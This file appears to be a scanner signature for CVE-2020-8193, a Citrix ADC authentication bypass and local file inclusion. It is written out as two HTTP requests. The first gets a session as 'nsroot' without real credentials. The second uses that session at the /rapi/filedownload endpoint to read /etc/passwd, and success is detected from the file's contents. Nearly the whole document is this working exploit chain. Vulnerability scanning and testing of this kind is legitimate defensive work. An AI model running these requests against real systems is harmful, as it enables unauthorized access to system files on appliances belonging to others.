id: CVE-2020-8193
single: true
info:
  name: Citrix ADC LFI - CVE-2020-8193
  risk: High

params:
  - root: "{{.BaseURL}}"
  - user: "e4LZnjB9"
  - pass: "kRcEnFy6"
  - file: "%2Fetc%2Fpasswd"

requests:
  # get session
  - method: POST
    redirect: false
    url: >-
      {{.root}}//pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Accept: application/xml
      - Accept-Language: en-US,en;q=0.5
      - Content-Type: application/xml
      - X-NITRO-USER: "{{.user}}"
      - X-NITRO-PASS: "{{.pass}}"
    body: |
      <appfwprofile><login></login></appfwprofile>
    detections:
      - >-
        StatusCode() == 406 && StringSearch("resHeaders", "SESSID=")
    conclusions:
      - RegexSelect("resHeaders", "SESSID=(?P<sess>([a-zA-Z0-9]+));")

  # pass session from request 1
  - conditions:
      - ValueOf("sess") !== ""
    method: POST
    redirect: false
    url: >-
      {{.root}}//rapi/filedownload?filter=path:{{.file}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Accept: application/xml
      - Accept-Language: en-US,en;q=0.5
      - Content-Type: application/xml
      - rand_key: 1968033329.1594279178769461
      - Accept: "*/*"
      - X-NITRO-USER: "{{.user}}"
      - X-NITRO-PASS: "{{.pass}}"
      - Cookie: SESSID=[[.sess]]; is_cisco_platform=0; startupapp=neo
    body: |
      <clipermission></clipermission>
    detections:
      - >-
        StringSearch("body", "root:") && StringSearch("body", "bin/bash")

reference:
  - links: 
    - https://dmaasland.github.io/posts/citrix.html
    - https://support.citrix.com/article/CTX276688
    - https://www.cvebase.com/cve/2020/8193